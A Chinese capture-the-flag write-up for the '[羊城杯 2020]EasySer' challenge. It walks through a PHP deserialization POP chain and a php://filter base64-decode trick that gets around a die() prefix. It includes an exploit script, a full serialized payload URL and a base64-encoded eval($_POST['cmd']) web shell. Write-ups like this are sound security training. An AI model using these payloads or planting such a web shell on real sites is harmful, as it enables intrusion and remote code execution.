刷题笔记:[羊城杯 2020]EasySer


前言

关键字:[死亡exit]

题解

有robots.txt

尝试http://127.0.0.1/ser.php,爆出源码

<?php
error_reporting(0);
if ($_SERVER['REMOTE_ADDR'] == "127.0.0.1") {
    highlight_file(__FILE__);
}
$flag = '{Trump_:"fake_news!"}';

class GWHT
{
    public $hero;

    public function __construct()
    {
        $this->hero = new Yasuo;
    }

    public function __toString()
    {
        if (isset($this->hero)) {
            return $this->hero->hasaki();
        } else {
            return "You don't look very happy";
        }
    }
}

class Yongen
{ //flag.php
    public $file;
    public $text;

    public function __construct($file = '', $text = '')
    {
        $this->file = $file;
        $this->text = $text;

    }

    public function hasaki()
    {
        $d = '<?php die("nononon");?>';
        $a = $d . $this->text;
        @file_put_contents($this->file, $a);
    }
}

class Yasuo
{
    public function hasaki()
    {
        return "I'm the best happy windy man";
    }
}

构造pop链

GWHT::__toString() -> Yongen::hasaki()

思路很简单

有死亡exit/die,所以用伪协议绕过。

<?php
$filename = 'php://filter/write=convert.base64-decode/resource=shell.php';
$data = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTsgPz4=';
$add_str = '111';
$d = '<?php die("nononon");?>';
$data = $d . $add_str . $data;
file_put_contents($filename, $data);

$add_str一个一个加字符测试

然后,问题是,如何触发GWHT类的__toString()?,反序列化点又在哪里???

百度了一圈,WP基本都没说……拿arjun爆破

exp

<?php

class GWHT
{
    public $hero;

}

class Yongen
{
    public $file;
    public $text;
}


$a = new GWHT();
$a->hero = new Yongen();
$a->hero->file = 'php://filter/write=convert.base64-decode/resource=shell.php';
$a->hero->text = '111' . 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTsgPz4=';

echo urlencode(serialize($a));

payload打入

/star1.php?path=http://127.0.0.1/ser.php&c=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A59%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A43%3A%22111PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTsgPz4%3D%22%3B%7D%7D

蚁剑连接,结束。


文章作者: 巡璃
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 巡璃 !
评论
  目录